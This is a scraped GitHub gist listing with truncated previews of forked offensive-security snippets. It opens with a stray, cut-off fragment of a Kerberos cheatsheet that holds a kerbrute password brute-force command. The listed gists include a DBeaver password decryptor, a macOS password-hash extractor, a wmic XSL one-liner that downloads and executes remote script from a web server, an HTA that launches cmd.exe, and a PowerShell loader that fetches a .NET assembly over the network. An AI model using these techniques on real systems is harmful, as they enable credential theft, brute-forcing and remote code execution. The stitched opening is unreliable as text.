With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>With Rubeus version with brute module:
atropineal atropineal
atropineal
/ decrypt_dbeaver.py
Created
October 21, 2022 08:51
— forked from felipou/decrypt_dbeaver.py
DBeaver password decryption script - for newer versions of DBeaver
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # https://stackoverflow.com/questions/39928401/recover-db-password-stored-in-my-dbeaver-connection | |
| # requires pycryptodome lib (pip install pycryptodome) | |
| import sys | |
| import base64 | |
| import os | |
| import json | |
| from Crypto.Cipher import AES |
atropineal
/ kerberos_attacks_cheatsheet.md
Created
June 21, 2021 07:54
— forked from TarlogicSecurity/kerberos_attacks_cheatsheet.md
A cheatsheet with commands that can be used to perform kerberos attacks
atropineal
/ Get-InjectedThread.ps1
Created
January 28, 2021 09:04
— forked from jaredcatkinson/Get-InjectedThread.ps1
Code from "Taking Hunting to the Next Level: Hunting in Memory" presentation at SANS Threat Hunting Summit 2017 by Jared Atkinson and Joe Desimone
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function Get-InjectedThread | |
| { | |
| <# | |
| .SYNOPSIS | |
| Looks for threads that were created as a result of code injection. | |
| .DESCRIPTION | |
atropineal
/ osx_extract_hash.py
Created
May 27, 2020 12:46
— forked from teddziuba/osx_extract_hash.py
Extract a Mac OSX Catalina user's password hash as a hashcat-compatible string
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3 | |
| """ | |
| Mac OSX Catalina User Password Hash Extractor | |
| Extracts a user's password hash as a hashcat-compatible string. | |
| Mac OSX Catalina (10.15) uses a salted SHA-512 PBKDF2 for storing user passwords | |
| (hashcat type 7100), and it's saved in an annoying binary-plist-nested-inside-xml-plist | |
| format, so previously reported methods for extracting the hash don't work. |
atropineal
/ Test-WinCredential.ps1
Created
April 15, 2020 10:21
— forked from mklement0/Test-WinCredential.ps1
Test-WinCredential: PowerShell function for validating Windows domain / local user credentials.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function Test-WinCredential { | |
| <# | |
| .SYNOPSIS | |
| Validates Windows user credentials. | |
| .DESCRIPTION | |
| Validates a [pscredential] instance representing user-account credentials | |
| against the current user's logon domain or local machine. | |
| .PARAMETER Credential |
atropineal
/ Test-WinCredential.ps1
Created
April 15, 2020 10:21
— forked from mklement0/Test-WinCredential.ps1
Test-WinCredential: PowerShell function for validating Windows domain / local user credentials.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function Test-WinCredential { | |
| <# | |
| .SYNOPSIS | |
| Validates Windows user credentials. | |
| .DESCRIPTION | |
| Validates a [pscredential] instance representing user-account credentials | |
| against the current user's logon domain or local machine. | |
| .PARAMETER Credential |
atropineal
/ wmic.xsl
Created
November 13, 2019 14:27
— forked from Arno0x/wmic.xsl
Oneliner for arbitrary code download and execution
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?xml version='1.0'?> | |
| <!-- Discovered by @SubTee and @mattifestation --> | |
| <!-- Execute with: wmic os get /format:"https://webserver/wmic.xsl" --> | |
| <stylesheet | |
| xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt" | |
| xmlns:user="placeholder" | |
| version="1.0"> | |
| <output method="text"/> | |
| <ms:script implements-prefix="user" language="JScript"> | |
| <![CDATA[ |
atropineal
/ calc.hta
Created
November 13, 2019 14:27
— forked from Arno0x/calc.hta
HTML Application example to be executed by mstha.exe
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <html> | |
| <head> | |
| <HTA:APPLICATION ID="HelloExample"> | |
| <script language="jscript"> | |
| var c = "cmd.exe /c calc.exe"; | |
| new ActiveXObject('WScript.Shell').Run(c); | |
| </script> | |
| </head> | |
| <body> | |
| <script>self.close();</script> |
atropineal
/ psCompress.ps1
Created
November 13, 2019 14:21
— forked from marcgeld/psCompress.ps1
Powershell: Compress and decompress byte array
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Compress and decompress byte array | |
| function Get-CompressedByteArray { | |
| [CmdletBinding()] | |
| Param ( | |
| [Parameter(Mandatory,ValueFromPipeline,ValueFromPipelineByPropertyName)] | |
| [byte[]] $byteArray = $(Throw("-byteArray is required")) | |
| ) | |
| Process { |
atropineal
/ loadAssembly_method1.ps1
Created
November 12, 2019 23:52
— forked from Arno0x/loadAssembly_method1.ps1
Load a .Net assembly dynamically from PowerShell
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $Source = @" | |
| using System; | |
| using System.Net; | |
| using System.Reflection; | |
| namespace LoadAssembly { | |
| public static class LoadAssembly { | |
| public static void load() { | |
| WebClient webclient = new WebClient(); | |
| IWebProxy defaultProxy = WebRequest.DefaultWebProxy; | |
| if (defaultProxy != null) { |
NewerOlder